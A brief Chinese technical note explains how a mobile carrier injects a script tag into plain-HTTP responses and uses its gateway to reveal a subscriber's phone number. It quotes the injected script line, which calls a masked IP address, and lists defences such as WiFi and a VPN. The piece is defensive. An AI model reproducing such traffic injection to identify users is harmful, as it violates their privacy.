原理

http请求时候是明文,也就是请求可以随意被运行商玩弄 流量经过联通的网关后,联通判断为http明文流量,强行在响应中插入自己的内容

  1. <script charset="UTF-8" src="http://*.*.28.96:8080/get?time=1527064790657&amp;tlbsip=http://*.*.28.96:8080/&amp;website=m.8684.cn&amp;charset=utf-8"></script>

因为我们上网需要经过联通网关进行认证与计费,所以访问相应的联通接口后,联通的接口通过我们手机上网的网关的认证去获取我们的手机号,并在接口中响应

防御

  1. WIFI
  2. VPN
  3. 在VPN上reject请求联通接口的ip